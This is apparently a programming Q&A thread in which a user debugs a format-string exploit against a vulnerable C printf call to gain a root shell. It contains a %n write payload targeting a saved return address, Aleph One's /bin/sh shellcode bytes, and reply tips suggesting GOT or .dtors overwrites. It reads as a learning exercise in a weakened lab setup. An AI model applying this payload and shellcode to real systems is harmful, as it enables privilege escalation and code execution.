# Format String exploit - opening root shell

Tags: c, security, string-formatting, format-string

I'm running this in an environment with stack randomization disabled, and using the gcc version compatible with AlephOne's buffer overflow - that works great!

I'm trying to overwrite the instruction pointer register (eip) with the address of the array containing my shellcode. I always end up with segmentation fault though. The following is a snippet I'm trying to exploit:

```
//Prints version
static
void print_version(char* cmd) 
{
    char txt[640+1];
    snprintf(txt, 640, "Submission program version 0.1 (%s)\n", cmd);
    printf(txt);
}
```

I'm calling this function through execve(). The format string is the argv[0] here, which is successfully passed to the function above.

I'm having this format string:

```
\x0c\xdc\xbf\xffjunk\x0d\xdc\xbf\xffjunk\x0e\xdc\xbf\xffjunk\x0f\xdc\xbf\xff%8x%8x%120x%n%5x%n%230x%n%64x%n
```

followed by 200 NOPs, shellcode and remaining array with the NOPs as well.

The shellcode is Aleph One's code:

```
static char shellcode[] =
```

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

Going back to the format string, I'm overwriting 4 addresses 0xffbfdc0c to 0xffbfdc0f. 0xffbfdc0c is the saved eip address I found by setting a break point on print_version() function mentioned at the top.

I'm trying to replace it with the address 0xffbfdcd4, which is 150 bytes above the base address for txt[] array in print_version (counting the initial characters of the txt[] in the function and format string after that, hoping it may land somewhere in the NOPs preceding the shellcode).

I just end up with a SEG fault. I'm not sure how to proceed further or how I should debug to see if it's actually overwriting the value at the intended address.

EDIT: Am I using the correct format string?

Could anyone also tell me how to check the address using gdb after my program has generated a segment fault or right before a seg fault but after change of address?

Thanks.

Answer (score 0):

A few things.. you state that your format string is argv[0]. Are you sure you didn't mean argv[1]? argv[0] is typically reserved for the program name, argv[1] being the first argument to the program.

You can examine the address after the right by setting a breakpoint before the right occurs and immediately after, and then using x/x 0xffbfdc0c to see if you're writing to the correct location. The GDB manual (available online) may be helpful to you as well.

The neat thing about format string writes are that you're not limited to where you can write, so anything is free game (hint hint). You might want to make sure that -D_FORITY_SOURCE isn't being set when you compile your program as well.

Comment: Yeah, it is actually argv[0] that is being passed to the function above. I'm supplying the format string as argv[0] using execve("vulnerable", argv[], env). A little non-standard way but setting argv[0] still executes executes the program.

Comment: I'm able to check the address after the seg fault, and unfortunately the format string fails to work (the value is the same as before). I'm stumped.

Comment: Regarding the flag, I'm just passing the -ggdb and -Wall arguments to gcc.

Comment: Can you try writing a value such as 0xdeadbeef to another arbitrary location instead? Perhaps .dtors or GOT entry?